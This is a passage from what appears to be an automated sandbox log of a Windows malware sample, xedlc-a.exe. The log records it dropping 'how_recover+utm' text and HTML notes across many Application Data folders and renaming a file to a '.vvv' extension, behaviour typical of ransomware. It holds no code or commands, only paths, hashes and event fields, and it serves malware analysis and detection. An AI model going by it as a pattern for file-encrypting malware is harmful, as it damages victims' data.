58557.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
58558.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
58559.            ads:
58560.          fid (ads:): 281474976778411
58561.          ntstatus: 0x0
58562.          CreateOptions: 0x0
58563.        file:
58564.          timestamp: 88593
58565.          mode: created
58566.          sequenceNumber: 1536
58567.          value: C:\Documents and Settings\admin\Application Data\Opera\Opera\how_recover+utm.html
58568.          processinfo:
58569.            pid: 1056
58570.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
58571.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
58572.            ads:
58573.          fid (ads:): 281474976778412
58574.          ntstatus: 0x0
58575.          CreateOptions: 0x60
58576.        file:
58577.          timestamp: 88599
58578.          mode: close
58579.          sequenceNumber: 1537
58580.          value: C:\Documents and Settings\admin\Application Data\Opera\Opera\how_recover+utm.html
58581.          filesize: 9495
58582.          md5sum: 95f596a25dff51b6af2042b1bbe02985
58583.          sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
58584.          processinfo:
58585.            pid: 1056
58586.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
58587.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
58588.            ads:
58589.          fid (ads:): 281474976778412
58590.          ntstatus: 0x0
58591.          CreateOptions: 0x0
58592.        file:
58593.          timestamp: 88605
58594.          mode: created
58595.          sequenceNumber: 1538
58596.          value: C:\Documents and Settings\admin\Application Data\Opera\how_recover+utm.txt
58597.          processinfo:
58598.            pid: 1056
58599.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
58600.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
58601.            ads:
58602.          fid (ads:): 281474976778413
58603.          ntstatus: 0x0
58604.          CreateOptions: 0x60
58605.        file:
58606.          timestamp: 88611
58607.          mode: close
58608.          sequenceNumber: 1539
58609.          value: C:\Documents and Settings\admin\Application Data\Opera\how_recover+utm.txt
58610.          filesize: 2682
58611.          md5sum: dbb0eda595eb83a05d3bc771ae2561a4
58612.          sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
58613.          processinfo:
58614.            pid: 1056
58615.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
58616.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
58617.            ads:
58618.          fid (ads:): 281474976778413
58619.          ntstatus: 0x0
58620.          CreateOptions: 0x0
58621.        file:
58622.          timestamp: 88617
58623.          mode: created
58624.          sequenceNumber: 1540
58625.          value: C:\Documents and Settings\admin\Application Data\Opera\how_recover+utm.html
58626.          processinfo:
58627.            pid: 1056
58628.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
58629.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
58630.            ads:
58631.          fid (ads:): 281474976778414
58632.          ntstatus: 0x0
58633.          CreateOptions: 0x60
58634.        file:
58635.          timestamp: 88623
58636.          mode: close
58637.          sequenceNumber: 1541
58638.          value: C:\Documents and Settings\admin\Application Data\Opera\how_recover+utm.html
58639.          filesize: 9495
58640.          md5sum: 95f596a25dff51b6af2042b1bbe02985
58641.          sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
58642.          processinfo:
58643.            pid: 1056
58644.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
58645.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
58646.            ads:
58647.          fid (ads:): 281474976778414
58648.          ntstatus: 0x0
58649.          CreateOptions: 0x0
58650.        file:
58651.          timestamp: 88655
58652.          mode: created
58653.          sequenceNumber: 1542
58654.          value: C:\Documents and Settings\admin\Application Data\Real\RealConverter\how_recover+utm.txt
58655.          processinfo:
58656.            pid: 1056
58657.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
58658.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
58659.            ads:
58660.          fid (ads:): 281474976778415
58661.          ntstatus: 0x0
58662.          CreateOptions: 0x60
58663.        file:
58664.          timestamp: 88661
58665.          mode: close
58666.          sequenceNumber: 1543
58667.          value: C:\Documents and Settings\admin\Application Data\Real\RealConverter\how_recover+utm.txt
58668.          filesize: 2682
58669.          md5sum: dbb0eda595eb83a05d3bc771ae2561a4
58670.          sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
58671.          processinfo:
58672.            pid: 1056
58673.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
58674.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
58675.            ads:
58676.          fid (ads:): 281474976778415
58677.          ntstatus: 0x0
58678.          CreateOptions: 0x0
58679.        file:
58680.          timestamp: 88687
58681.          mode: created
58682.          sequenceNumber: 1544
58683.          value: C:\Documents and Settings\admin\Application Data\Real\RealConverter\how_recover+utm.html
58684.          processinfo:
58685.            pid: 1056
58686.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
58687.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
58688.            ads:
58689.          fid (ads:): 281474976778416
58690.          ntstatus: 0x0
58691.          CreateOptions: 0x60
58692.        file:
58693.          timestamp: 88693
58694.          mode: close
58695.          sequenceNumber: 1545
58696.          value: C:\Documents and Settings\admin\Application Data\Real\RealConverter\how_recover+utm.html
58697.          filesize: 9495
58698.          md5sum: 95f596a25dff51b6af2042b1bbe02985
58699.          sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
58700.          processinfo:
58701.            pid: 1056
58702.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
58703.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
58704.            ads:
58705.          fid (ads:): 281474976778416
58706.          ntstatus: 0x0
58707.          CreateOptions: 0x0
58708.        file:
58709.          timestamp: 88819
58710.          mode: created
58711.          sequenceNumber: 1546
58712.          value: C:\Documents and Settings\admin\Application Data\Real\RealPlayer\ErrorLogs\how_recover+utm.txt
58713.          processinfo:
58714.            pid: 1056
58715.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
58716.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
58717.            ads:
58718.          fid (ads:): 281474976778417
58719.          ntstatus: 0x0
58720.          CreateOptions: 0x60
58721.        file:
58722.          timestamp: 88825
58723.          mode: close
58724.          sequenceNumber: 1547
58725.          value: C:\Documents and Settings\admin\Application Data\Real\RealPlayer\ErrorLogs\how_recover+utm.txt
58726.          filesize: 2682
58727.          md5sum: dbb0eda595eb83a05d3bc771ae2561a4
58728.          sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
58729.          processinfo:
58730.            pid: 1056
58731.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
58732.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
58733.            ads:
58734.          fid (ads:): 281474976778417
58735.          ntstatus: 0x0
58736.          CreateOptions: 0x0
58737.        file:
58738.          timestamp: 88831
58739.          mode: created
58740.          sequenceNumber: 1548
58741.          value: C:\Documents and Settings\admin\Application Data\Real\RealPlayer\ErrorLogs\how_recover+utm.html
58742.          processinfo:
58743.            pid: 1056
58744.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
58745.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
58746.            ads:
58747.          fid (ads:): 281474976778418
58748.          ntstatus: 0x0
58749.          CreateOptions: 0x60
58750.        file:
58751.          timestamp: 88837
58752.          mode: close
58753.          sequenceNumber: 1549
58754.          value: C:\Documents and Settings\admin\Application Data\Real\RealPlayer\ErrorLogs\how_recover+utm.html
58755.          filesize: 9495
58756.          md5sum: 95f596a25dff51b6af2042b1bbe02985
58757.          sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
58758.          processinfo:
58759.            pid: 1056
58760.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
58761.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
58762.            ads:
58763.          fid (ads:): 281474976778418
58764.          ntstatus: 0x0
58765.          CreateOptions: 0x0
58766.        file:
58767.          timestamp: 88871
58768.          mode: open
58769.          sequenceNumber: 1550
58770.          value: C:\Documents and Settings\admin\Application Data\Real\RealPlayer\RealPlayer-log.txt
58771.          filesize: 80971
58772.          processinfo:
58773.            pid: 1056
58774.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
58775.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
58776.            ads:
58777.          fid (ads:): 844424930192785
58778.          ntstatus: 0x0
58779.          CreateOptions: 0x60
58780.        file:
58781.          timestamp: 89856
58782.          mode: close
58783.          sequenceNumber: 1551
58784.          value: C:\Documents and Settings\admin\Application Data\Real\RealPlayer\RealPlayer-log.txt
58785.          filesize: 81390
58786.          md5sum: 19899e23528d4c7e7b2f6f9fd0aaa976
58787.          sha1sum: 988322ed02b8877307caad0e946a50185c2eacbd
58788.          processinfo:
58789.            pid: 1056
58790.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
58791.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
58792.            ads:
58793.          fid (ads:): 844424930192785
58794.          ntstatus: 0x0
58795.          CreateOptions: 0x0
58796.        file:
58797.          timestamp: 89865
58798.          mode: rename
58799.          sequenceNumber: 1552
58800.          filesize: 81390
58801.          md5sum: 19899e23528d4c7e7b2f6f9fd0aaa976
58802.          sha1sum: 988322ed02b8877307caad0e946a50185c2eacbd
58803.          processinfo:
58804.            pid: 1056
58805.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
58806.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
58807.          old_name: C:\Documents and Settings\admin\Application Data\Real\RealPlayer\RealPlayer-log.txt
58808.          new_name: C:\Documents and Settings\admin\Application Data\Real\RealPlayer\RealPlayer-log.txt.vvv
58809.            ads:
58810.          fid (ads:): 844424930192785
58811.          ntstatus: 0x0
58812.          CreateOptions: 0x0
58813.        file:
58814.          timestamp: 89903
58815.          mode: created
58816.          sequenceNumber: 1553
58817.          value: C:\Documents and Settings\admin\Application Data\Real\RealPlayer\how_recover+utm.txt
58818.          processinfo:
58819.            pid: 1056
58820.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
58821.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
58822.            ads:
58823.          fid (ads:): 281474976778419
58824.          ntstatus: 0x0
58825.          CreateOptions: 0x60
58826.        file:
58827.          timestamp: 89909
58828.          mode: close
58829.          sequenceNumber: 1554
58830.          value: C:\Documents and Settings\admin\Application Data\Real\RealPlayer\how_recover+utm.txt
58831.          filesize: 2682
58832.          md5sum: dbb0eda595eb83a05d3bc771ae2561a4
58833.          sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
58834.          processinfo:
58835.            pid: 1056
58836.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
58837.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
58838.            ads:
58839.          fid (ads:): 281474976778419
58840.          ntstatus: 0x0
58841.          CreateOptions: 0x0
58842.        file:
58843.          timestamp: 89916
58844.          mode: created
58845.          sequenceNumber: 1555
58846.          value: C:\Documents and Settings\admin\Application Data\Real\RealPlayer\how_recover+utm.html
58847.          processinfo:
58848.            pid: 1056
58849.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
58850.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
58851.            ads:
58852.          fid (ads:): 281474976778420
58853.          ntstatus: 0x0
58854.          CreateOptions: 0x60
58855.        file:
58856.          timestamp: 89921
58857.          mode: close
58858.          sequenceNumber: 1556
58859.          value: C:\Documents and Settings\admin\Application Data\Real\RealPlayer\how_recover+utm.html
58860.          filesize: 9495
58861.          md5sum: 95f596a25dff51b6af2042b1bbe02985
58862.          sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
58863.          processinfo:
58864.            pid: 1056
58865.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
58866.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
58867.            ads:
58868.          fid (ads:): 281474976778420
58869.          ntstatus: 0x0
58870.          CreateOptions: 0x0
58871.        file:
58872.          timestamp: 89961
58873.          mode: created
58874.          sequenceNumber: 1557
58875.          value: C:\Documents and Settings\admin\Application Data\Real\rnadmin\how_recover+utm.txt
58876.          processinfo:
58877.            pid: 1056
58878.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
58879.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
58880.            ads:
58881.          fid (ads:): 281474976778421
58882.          ntstatus: 0x0
58883.          CreateOptions: 0x60
58884.        file:
58885.          timestamp: 89966
58886.          mode: close
58887.          sequenceNumber: 1558
58888.          value: C:\Documents and Settings\admin\Application Data\Real\rnadmin\how_recover+utm.txt
58889.          filesize: 2682
58890.          md5sum: dbb0eda595eb83a05d3bc771ae2561a4
58891.          sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
58892.          processinfo:
58893.            pid: 1056
58894.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
58895.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
58896.            ads:
58897.          fid (ads:): 281474976778421
58898.          ntstatus: 0x0
58899.          CreateOptions: 0x0
58900.        file:
58901.          timestamp: 89972
58902.          mode: created
58903.          sequenceNumber: 1559
58904.          value: C:\Documents and Settings\admin\Application Data\Real\rnadmin\how_recover+utm.html
58905.          processinfo:
58906.            pid: 1056
58907.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
58908.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
58909.            ads:
58910.          fid (ads:): 281474976778422
58911.          ntstatus: 0x0
58912.          CreateOptions: 0x60
58913.        file:
58914.          timestamp: 89978
58915.          mode: close
58916.          sequenceNumber: 1560
58917.          value: C:\Documents and Settings\admin\Application Data\Real\rnadmin\how_recover+utm.html
58918.          filesize: 9495
58919.          md5sum: 95f596a25dff51b6af2042b1bbe02985
58920.          sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
58921.          processinfo:
58922.            pid: 1056
58923.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
58924.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
58925.            ads:
58926.          fid (ads:): 281474976778422
58927.          ntstatus: 0x0
58928.          CreateOptions: 0x0
58929.        file:
58930.          timestamp: 90048
58931.          mode: created
58932.          sequenceNumber: 1561
58933.          value: C:\Documents and Settings\admin\Application Data\Real\how_recover+utm.txt
58934.          processinfo:
58935.            pid: 1056
58936.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
58937.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
58938.            ads:
58939.          fid (ads:): 281474976778423
58940.          ntstatus: 0x0
58941.          CreateOptions: 0x60
58942.        file:
58943.          timestamp: 90053
58944.          mode: close
58945.          sequenceNumber: 1562
58946.          value: C:\Documents and Settings\admin\Application Data\Real\how_recover+utm.txt
58947.          filesize: 2682
58948.          md5sum: dbb0eda595eb83a05d3bc771ae2561a4
58949.          sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
58950.          processinfo:
58951.            pid: 1056
58952.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
58953.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
58954.            ads:
58955.          fid (ads:): 281474976778423
58956.          ntstatus: 0x0
58957.          CreateOptions: 0x0
58958.        file:
58959.          timestamp: 90172
58960.          mode: created
58961.          sequenceNumber: 1563
58962.          value: C:\Documents and Settings\admin\Application Data\Real\how_recover+utm.html
58963.          processinfo:
58964.            pid: 1056
58965.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
58966.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
58967.            ads:
58968.          fid (ads:): 281474976778424
58969.          ntstatus: 0x0
58970.          CreateOptions: 0x60
58971.        file:
58972.          timestamp: 90178
58973.          mode: close
58974.          sequenceNumber: 1564
58975.          value: C:\Documents and Settings\admin\Application Data\Real\how_recover+utm.html
58976.          filesize: 9495
58977.          md5sum: 95f596a25dff51b6af2042b1bbe02985
58978.          sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
58979.          processinfo:
58980.            pid: 1056
58981.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
58982.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
58983.            ads:
58984.          fid (ads:): 281474976778424
58985.          ntstatus: 0x0
58986.          CreateOptions: 0x0
58987.        file:
58988.          timestamp: 90258
58989.          mode: created
58990.          sequenceNumber: 1565
58991.          value: C:\Documents and Settings\admin\Application Data\Sun\Java\AU\how_recover+utm.txt
58992.          processinfo:
58993.            pid: 1056
58994.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
58995.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
58996.            ads:
58997.          fid (ads:): 281474976778425
58998.          ntstatus: 0x0
58999.          CreateOptions: 0x60
59000.        file:
59001.          timestamp: 90263
59002.          mode: close
59003.          sequenceNumber: 1566
59004.          value: C:\Documents and Settings\admin\Application Data\Sun\Java\AU\how_recover+utm.txt
59005.          filesize: 2682
59006.          md5sum: dbb0eda595eb83a05d3bc771ae2561a4
59007.          sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
59008.          processinfo:
59009.            pid: 1056
59010.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
59011.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
59012.            ads:
59013.          fid (ads:): 281474976778425
59014.          ntstatus: 0x0
59015.          CreateOptions: 0x0
59016.        file:
59017.          timestamp: 90270
59018.          mode: created
59019.          sequenceNumber: 1567
59020.          value: C:\Documents and Settings\admin\Application Data\Sun\Java\AU\how_recover+utm.html
59021.          processinfo:
59022.            pid: 1056
59023.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
59024.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
59025.            ads:
59026.          fid (ads:): 281474976778426
59027.          ntstatus: 0x0
59028.          CreateOptions: 0x60
59029.        file:
59030.          timestamp: 90276
59031.          mode: close
59032.          sequenceNumber: 1568
59033.          value: C:\Documents and Settings\admin\Application Data\Sun\Java\AU\how_recover+utm.html
59034.          filesize: 9495
59035.          md5sum: 95f596a25dff51b6af2042b1bbe02985
59036.          sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
59037.          processinfo:
59038.            pid: 1056
59039.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
59040.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
59041.            ads:
59042.          fid (ads:): 281474976778426
59043.          ntstatus: 0x0
59044.          CreateOptions: 0x0
59045.        file:
59046.          timestamp: 90286
59047.          mode: created
59048.          sequenceNumber: 1569
59049.          value: C:\Documents and Settings\admin\Application Data\Sun\Java\Deployment\security\how_recover+utm.txt
59050.          processinfo:
59051.            pid: 1056
59052.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
59053.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
59054.            ads:
59055.          fid (ads:): 281474976778427
59056.          ntstatus: 0x0
59057.          CreateOptions: 0x60
59058.        file:
59059.          timestamp: 90292
59060.          mode: close
59061.          sequenceNumber: 1570
59062.          value: C:\Documents and Settings\admin\Application Data\Sun\Java\Deployment\security\how_recover+utm.txt
59063.          filesize: 2682
59064.          md5sum: dbb0eda595eb83a05d3bc771ae2561a4
59065.          sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
59066.          processinfo:
59067.            pid: 1056
59068.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
59069.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
59070.            ads:
59071.          fid (ads:): 281474976778427
59072.          ntstatus: 0x0
59073.          CreateOptions: 0x0
59074.        file:
59075.          timestamp: 90299
59076.          mode: created
59077.          sequenceNumber: 1571
59078.          value: C:\Documents and Settings\admin\Application Data\Sun\Java\Deployment\security\how_recover+utm.html
59079.          processinfo:
59080.            pid: 1056
59081.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
59082.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
59083.            ads:
59084.          fid (ads:): 281474976778428
59085.          ntstatus: 0x0
59086.          CreateOptions: 0x60
59087.        file:
59088.          timestamp: 90305
59089.          mode: close
59090.          sequenceNumber: 1572
59091.          value: C:\Documents and Settings\admin\Application Data\Sun\Java\Deployment\security\how_recover+utm.html
59092.          filesize: 9495
59093.          md5sum: 95f596a25dff51b6af2042b1bbe02985
59094.          sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
59095.          processinfo:
59096.            pid: 1056
59097.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
59098.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
59099.            ads:
59100.          fid (ads:): 281474976778428
59101.          ntstatus: 0x0
59102.          CreateOptions: 0x0
59103.        file:
59104.          timestamp: 90314
59105.          mode: created
59106.          sequenceNumber: 1573
59107.          value: C:\Documents and Settings\admin\Application Data\Sun\Java\Deployment\tmp\si\how_recover+utm.txt
59108.          processinfo:
59109.            pid: 1056
59110.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
59111.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
59112.            ads:
59113.          fid (ads:): 281474976778429
59114.          ntstatus: 0x0
59115.          CreateOptions: 0x60
59116.        file:
59117.          timestamp: 90320
59118.          mode: close
59119.          sequenceNumber: 1574
59120.          value: C:\Documents and Settings\admin\Application Data\Sun\Java\Deployment\tmp\si\how_recover+utm.txt
59121.          filesize: 2682
59122.          md5sum: dbb0eda595eb83a05d3bc771ae2561a4
59123.          sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
59124.          processinfo:
59125.            pid: 1056
59126.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
59127.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
59128.            ads:
59129.          fid (ads:): 281474976778429
59130.          ntstatus: 0x0
59131.          CreateOptions: 0x0
59132.        file:
59133.          timestamp: 90326
59134.          mode: created
59135.          sequenceNumber: 1575
59136.          value: C:\Documents and Settings\admin\Application Data\Sun\Java\Deployment\tmp\si\how_recover+utm.html
59137.          processinfo:
59138.            pid: 1056
59139.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
59140.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
59141.            ads:
59142.          fid (ads:): 281474976778430
59143.          ntstatus: 0x0
59144.          CreateOptions: 0x60
59145.        file:
59146.          timestamp: 90332
59147.          mode: close
59148.          sequenceNumber: 1576
59149.          value: C:\Documents and Settings\admin\Application Data\Sun\Java\Deployment\tmp\si\how_recover+utm.html
59150.          filesize: 9495
59151.          md5sum: 95f596a25dff51b6af2042b1bbe02985
59152.          sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
59153.          processinfo:
59154.            pid: 1056
59155.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
59156.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
59157.            ads:
59158.          fid (ads:): 281474976778430
59159.          ntstatus: 0x0
59160.          CreateOptions: 0x0
59161.        file:
59162.          timestamp: 90339
59163.          mode: created
59164.          sequenceNumber: 1577
59165.          value: C:\Documents and Settings\admin\Application Data\Sun\Java\Deployment\tmp\how_recover+utm.txt
59166.          processinfo:
59167.            pid: 1056
59168.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
59169.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
59170.            ads:
59171.          fid (ads:): 281474976778431
59172.          ntstatus: 0x0
59173.          CreateOptions: 0x60
59174.        file:
59175.          timestamp: 90345
59176.          mode: close
59177.          sequenceNumber: 1578
59178.          value: C:\Documents and Settings\admin\Application Data\Sun\Java\Deployment\tmp\how_recover+utm.txt
59179.          filesize: 2682
59180.          md5sum: dbb0eda595eb83a05d3bc771ae2561a4
59181.          sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
59182.          processinfo:
59183.            pid: 1056
59184.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
59185.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
59186.            ads:
59187.          fid (ads:): 281474976778431
59188.          ntstatus: 0x0
59189.          CreateOptions: 0x0
59190.        file:
59191.          timestamp: 90353
59192.          mode: created
59193.          sequenceNumber: 1579
59194.          value: C:\Documents and Settings\admin\Application Data\Sun\Java\Deployment\tmp\how_recover+utm.html
59195.          processinfo:
59196.            pid: 1056
59197.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
59198.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
59199.            ads:
59200.          fid (ads:): 281474976778432
59201.          ntstatus: 0x0
59202.          CreateOptions: 0x60
59203.        file:
59204.          timestamp: 90359
59205.          mode: close
59206.          sequenceNumber: 1580
59207.          value: C:\Documents and Settings\admin\Application Data\Sun\Java\Deployment\tmp\how_recover+utm.html
59208.          filesize: 9495
59209.          md5sum: 95f596a25dff51b6af2042b1bbe02985
59210.          sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
59211.          processinfo:
59212.            pid: 1056
59213.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
59214.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
59215.            ads:
59216.          fid (ads:): 281474976778432
59217.          ntstatus: 0x0
59218.          CreateOptions: 0x0
59219.        file:
59220.          timestamp: 90411
59221.          mode: created
59222.          sequenceNumber: 1581
59223.          value: C:\Documents and Settings\admin\Application Data\Sun\Java\Deployment\how_recover+utm.txt
59224.          processinfo:
59225.            pid: 1056
59226.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
59227.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
59228.            ads:
59229.          fid (ads:): 281474976778433
59230.          ntstatus: 0x0
59231.          CreateOptions: 0x60
59232.        file:
59233.          timestamp: 90417
59234.          mode: close
59235.          sequenceNumber: 1582
59236.          value: C:\Documents and Settings\admin\Application Data\Sun\Java\Deployment\how_recover+utm.txt
59237.          filesize: 2682
59238.          md5sum: dbb0eda595eb83a05d3bc771ae2561a4
59239.          sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
59240.          processinfo:
59241.            pid: 1056
59242.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
59243.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
59244.            ads:
59245.          fid (ads:): 281474976778433
59246.          ntstatus: 0x0
59247.          CreateOptions: 0x0
59248.        file:
59249.          timestamp: 90424
59250.          mode: created
59251.          sequenceNumber: 1583
59252.          value: C:\Documents and Settings\admin\Application Data\Sun\Java\Deployment\how_recover+utm.html
59253.          processinfo:
59254.            pid: 1056
59255.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
59256.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
59257.            ads:
59258.          fid (ads:): 281474976778434
59259.          ntstatus: 0x0
59260.          CreateOptions: 0x60
59261.        file:
59262.          timestamp: 90430
59263.          mode: close
59264.          sequenceNumber: 1584
59265.          value: C:\Documents and Settings\admin\Application Data\Sun\Java\Deployment\how_recover+utm.html
59266.          filesize: 9495
59267.          md5sum: 95f596a25dff51b6af2042b1bbe02985
59268.          sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
59269.          processinfo:
59270.            pid: 1056
59271.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
59272.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
59273.            ads:
59274.          fid (ads:): 281474976778434
59275.          ntstatus: 0x0
59276.          CreateOptions: 0x0
59277.        file:
59278.          timestamp: 90438
59279.          mode: created
59280.          sequenceNumber: 1585
59281.          value: C:\Documents and Settings\admin\Application Data\Sun\Java\jre1.6.0_16\how_recover+utm.txt
59282.          processinfo:
59283.            pid: 1056
59284.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
59285.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
59286.            ads:
59287.          fid (ads:): 281474976778435
59288.          ntstatus: 0x0
59289.          CreateOptions: 0x60
59290.        file:
59291.          timestamp: 90443
59292.          mode: close
59293.          sequenceNumber: 1586
59294.          value: C:\Documents and Settings\admin\Application Data\Sun\Java\jre1.6.0_16\how_recover+utm.txt
59295.          filesize: 2682
59296.          md5sum: dbb0eda595eb83a05d3bc771ae2561a4
59297.          sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
59298.          processinfo:
59299.            pid: 1056
59300.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
59301.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
59302.            ads:
59303.          fid (ads:): 281474976778435
59304.          ntstatus: 0x0
59305.          CreateOptions: 0x0
59306.        file:
59307.          timestamp: 90484
59308.          mode: created
59309.          sequenceNumber: 1587
59310.          value: C:\Documents and Settings\admin\Application Data\Sun\Java\jre1.6.0_16\how_recover+utm.html
59311.          processinfo:
59312.            pid: 1056
59313.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
59314.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
59315.            ads:
59316.          fid (ads:): 281474976778436
59317.          ntstatus: 0x0
59318.          CreateOptions: 0x60
59319.        file:
59320.          timestamp: 90490
59321.          mode: close
59322.          sequenceNumber: 1588
